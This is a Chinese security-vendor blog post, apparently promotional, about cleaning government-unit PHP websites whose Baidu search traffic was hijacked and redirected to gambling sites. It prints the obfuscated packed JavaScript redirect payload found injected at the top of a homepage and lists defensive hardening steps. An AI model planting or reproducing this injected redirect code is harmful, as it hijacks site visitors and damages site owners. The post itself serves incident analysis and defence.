单位网站老是被劫持跳转到菠菜网站怎么办
这几天我们Sine安全接到一个单位服务器里的三个网站都被劫持跳转问题的客户反映在百度搜索关键词后点击进入网站直接被跳转到菠菜网站,直接在浏览器里输入网址是正常打开的,由于客户单位网站的领导比较重视这个被恶意劫持跳转的问题特别要求加班要抓紧处理解决掉这个网站安全问题,因为实在是对该单位网站的信誉以及客户的信任度损害的比较大.
网站被劫持跳转的问题分析
随即我们和该单位网站负责人进行了服务器信息以及网站信息的交接,由我们Sinesafe安全部门的技术主管团队进行了全面的网站安全检测以及漏洞检测以及木马后门和恶意跳转代码的审计工作,发现客户的3个网站都是用的主流网站开源程序php+mysql架构,由于客户之前老是被劫持跳转,删除恶意代码后没过多久就又被篡改了,反复性质的被篡改客户经常为此问题烦恼。首先得让网站正常访问不让网站从百度搜索直接跳转,那么这个跳转代码一般都会加在首页文件最顶部。打开首页文件查看下源代码就会看到加密的代码也就是跳转的代码如图:
type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0 \\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))
上述代码就是一个js判断来路跳转的代码。跳转到的网站截图如下:
客户单位另一个网站用的是dz论坛程序也是被跳转了,代码被修改加在了config目录下的config_global.php文件里
客户的第三个网站用的是dedecms系统,首页也是被增加了和上述第一张图的代码,随即我们先对这3个站点的恶意跳转代码进行了清除,使网站正常访问,到这里并不是解决掉了问题哦! 这只是单纯的删除恶意跳转的代码,因为根源问题是在程序有漏洞导致被黑客入侵上传了webshell俗称网站木马后门.因为之前客户就说过是反复性质的被篡改!清理掉后没过多久就又被篡改了。所以要对程序漏洞进行详细的漏洞修补和代码的安全审计以及后门木马的清理和服务器安全的防护设置,才能确保网站日后的正常运行。
对症下药找出问题根源进行网站漏洞修补
针对这三个网站的程序代码进行了全面的人工安全代码审计以及漏洞检测修补和后门木马的清理,发现dedecms和dz论坛的程序存在getshell和sql注入获取管理员账户和密码,以及上传绕过漏洞。另外一个站是因为服务器的目录安全权限没做好,导致可以跨目录写入才会导致这个站也被篡改了,所以说如果服务器安全没做好,网站安全即使做的再牛逼也毫无用处,我们Sinesafe能做的就是让客户少走弯路,省心省力保障客户网站的安全运行。
下面几个图片就是被上传的网站后门木马代码:
下面介绍几个日常用到的防范网站被黑被入侵篡改的建议
1.对服务器目录权限的安全部署,对管理员账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。
2.mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。
3.对服务器底层系统进行安全加固,包括远程端口登录的安全验证。
4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。
单位网站老是被劫持跳转到菠菜网站怎么办相关推荐
- 网站老是被劫持怎么办
2019独角兽企业重金招聘Python工程师标准>>> 越来越多的网站被劫持,像跳转到彩piao网站,du博网站的情况时有发生,很多人可能都会经历过,电脑打开网站,以及手机打开移动端 ...
- 网站自动识别手机访问跳转至手机网站
如何让用户输入wap手机网站的网址时自动跳转到wap网站 ? wap页面自动跳转的实现方式 ? 如何判断访客是否是移动设备访问,自动跳转到wap页面 ? 手机自动跳转到手机页面,一个网址区分普通访问与 ...
- 购物网站被劫持跳转返利推广网站的分析过程和解决方法
当我们打开当当.京东.易迅等购物网站的时候,明明只是输入www.jd.com,然后看到地址的地址不断变来变去,最后地址栏显示的地址大概是这样的: http://www.jd.com/?utm_so ...
- 苹果cms播放页html,苹果CMS播放页被劫持跳转至qp网站的解决方案
本文将从笔者自身的分析方式出发,剖析CMS作者有意留下的JS漏洞位置和活加载外部JS的全部过程.多事之秋,以华为为代表的一批我国创新型企业不惧外部施压,用铁打的技术和超脱常人的眼界证明了中华儿女的不屈 ...
- 快照劫持怎么做的,网站劫持和跳转教程
最近收到站长SEO反馈,大量的网站快照被劫持,点击网站后劫持跳转另一个网站,有没有解决办法呢?整理一下关于快照被劫持和跳转到其他网站的方法. 1,经常查看自己的网站收录 如下图所示,每天site网址查 ...
- 百度快照被劫持跳转的解决办法
2019独角兽企业重金招聘Python工程师标准>>> 哥们的网站流量突然下降的很厉害,从原先一天500左右的IP,直接下降到80左右的IP,让我帮忙看看,网站到底哪里出了问题,首先 ...
- 网站快照被篡改劫持怎么办
最近很多公司的网站快照被劫持跳转到了bo彩.cai票网站上去,客户从百度点击进去会跳转,直接输入网站的域名不会跳转,网站快照也被劫持成bo彩的内容,site查看网站在百度的收录也出现问题,收录了很多c ...
- 打开百度跳转到另外一个网站、解决百度搜索引擎打开自己的网站却跳转到其他网站
为什么百度等搜索引擎打开自己的网站却跳转到其他网站?",这种情况,不要责怪百度搜索引擎,而是网站自身的原因,网站被挂马了.清理掉木马文件即可解决,下面360 网站管家 分享解决为什么百度等搜 ...
- 网站被劫持 网站被劫持跳转到非法页面的解决办法
某一客户单位的网站首页被篡改,并收到网jian的通知说是网站有漏洞,接到上级部门的信息安全整改通报,贵单位网站被植入木马文件,导致网站首页篡改跳转到caipiao网站,根据中华人民共和国计算机信息系统 ...
最新文章
- 【Android】EditText的一个问题
- CentOS7中使用Docker安装SVN以及配置账号权限
- 计算机第二章题库,全国计算机二级题库第二章
- 在java中构建高效的结果缓存
- oracle 之 COMMENT
- 前端打包利器webpack里utils.cssLoaders的工作原理调试
- Linux对包管理阐述
- linux core 永久生效,【调试】Core Dump是什么?Linux下如何正确永久开启?
- windows7中安装jdk1.8
- MySQL数据库优化二三事
- [转载] 远程方法调用(RMI)与远程过程调用(RPC)
- thinkphp 表单令牌
- 第二步_安装samba服务器
- WeChat 隐私政策
- 尚硅谷官网MySQL笔记
- 数字电子技术基础-阎石老师版本-学习记录
- 国家标准《软件工程 软件开发成本度量规范》GB/T 36964-2018正式发布
- 通用办公报表打印软件
- 文件或目录损坏且无法读取android studio
- 《愤怒的小鸟》全系列游戏——这些都玩过,你就碉堡了~(版本一)